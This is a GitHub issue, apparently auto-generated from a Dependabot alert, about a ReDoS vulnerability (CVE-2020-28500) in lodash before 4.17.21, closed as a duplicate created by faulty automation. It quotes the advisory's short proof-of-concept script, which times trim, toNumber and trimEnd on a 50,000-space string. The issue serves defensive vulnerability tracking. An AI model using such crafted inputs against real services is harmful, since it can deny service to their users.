Security Alert - Package: lodash; Severity: MEDIUM; Vuln ID: GHSA-29mw-wpgm-hmr9

Question

Security Alert - Package: lodash; Severity: MEDIUM; Vuln ID: GHSA-29mw-wpgm-hmr9

Closed this issue 3 years ago · 1 comments

due: 2022-03-25

    A new vulnerability has been reported by Dependabot. The criticality of this vulnerability is MEDIUM.

    MEDIUM vulnerabilities have an SLA of 60 days according to our policy.

    Affected package: lodash
    Ecosystem: NPM
    Affected version range: < 4.17.21

    Summary: Regular Expression Denial of Service (ReDoS) in lodash
    Description: All versions of package lodash prior to 4.17.21 are vulnerable to Regular Expression Denial of Service (ReDoS) via the toNumber, trim and trimEnd functions. Steps to reproduce (provided by reporter Liyuan Chen): var lo = require('lodash'); function build_blank (n) { var ret = "1" for (var i = 0; i < n; i++) { ret += " " } return ret + "1"; } var s = build_blank(50000) var time0 = Date.now(); lo.trim(s) var time_cost0 = Date.now() - time0; console.log("time_cost0: " + time_cost0) var time1 = Date.now(); lo.toNumber(s) var time_cost1 = Date.now() - time1; console.log("time_cost1: " + time_cost1) var time2 = Date.now(); lo.trimEnd(s) var time_cost2 = Date.now() - time2; console.log("time_cost2: " + time_cost2)
    identifiers: [{'type': 'GHSA', 'value': 'GHSA-29mw-wpgm-hmr9'}, {'type': 'CVE', 'value': 'CVE-2020-28500'}]

    Fixed Version: 4.17.21
    Created Date = January 18, 2022

    ***Additional Context***
    https://github.com/Recidiviz/supervision-success-component/security/dependabot?q=is%3Aopen+sort%3Anewest

Answer 1 · 2022-01-26T23:19:48.000Z

The Recidiviz security team has been exploring some automation in this ticket: https://github.com/Recidiviz/security-operations-automation/issues/5

The goal is to automatically generate Github issues when a Dependabot alert is made. On January 24, 2022, the script we are using was modified. This led
to several dozen duplicate issues being created and reported as vulnerabilities. This issue is one of those duplicate issues.

Given that the issue is a duplicate, we have closed this issue out and removed the following labels:

Severity Label
Subject: Security
Subject: Vulnerability